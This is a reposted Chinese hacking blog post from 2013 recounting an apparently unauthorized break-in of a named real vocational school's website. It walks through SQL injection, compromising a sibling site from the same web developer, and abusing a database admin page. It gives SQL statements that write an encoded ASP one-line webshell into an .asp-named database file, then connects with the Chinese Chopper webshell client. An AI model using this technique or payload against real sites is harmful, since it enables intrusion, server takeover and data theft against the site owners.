最新消息:

渗透蓝翔Web

未分类 admin 1625浏览 0评论

本帖最后由 Tr0jan 于 2013-5-31 15:24 编辑

作者:Tr0jan
博客:http://nono.so
————————————————————————————————————————–
————————————————————————————————————————–
目标:www.lxjx.cn 蓝翔技校
过程:判断下网站大概情况
140616866r4165s8z6n68n1
最后筛选从jixiechang.lxjx.cn入手,注入得出后台帐号密码admin xxoo,但是各种工具跑不出后台,在页面最下方发现网站建设公司
1406145e7t254df4dnz5bz1
140622ltelab3ppk1blohy1

通过对该公司的其他网站的检测,过程比较繁琐,一个一个测试,最后通过旁注得到该公司旗下某个站的SHELL,发现该站的后台目录/cnsail
得到此目录,打开我们的jixiechang.lxjx.cn/cnsail
140617ezhc83yqhmmyzjtj1

登陆
140846xulusx88pin8r0ph1

没发现可利用的地方,对/cnsail目录下进行进一步扫描,得到/cnsail/inc/data.asp
1406141zkqrxqzgqzqqoi11
这里我们创建一个ASP后缀的数据库f4ck.asp点击创建之后进入
140615gve1s9sf5f0c3v9a1

我们执行
1、Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
2、Insert INTO temp (cmd) VALUES(‘┼攠數畣整爠煥敵瑳∨≡┩愾’); //把编码后的一句话木马插入到temp表(密码a)
然后我们连接jixiechang.lxjx.cn/f4ck.asp
140621kh3n3cknuooufaa31

菜刀连接,直接可以任意跨目录,主站目录
140622hk3auajjzgeoogvg1

服务器在内网
140623msy7zzjqptap83hh1

没有继续渗透下去,里面黑客太多,至此结束。
从网站提取的数据库操作脚本

数据库连接脚本data.txt (21.16 KB, 下载次数: 18)

555555.jpg (263.51 KB, 下载次数: 0)

 

140814ozjyrh7rrdx4xxgy1

转载请注明:jinglingshu的博客 » 渗透蓝翔Web

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址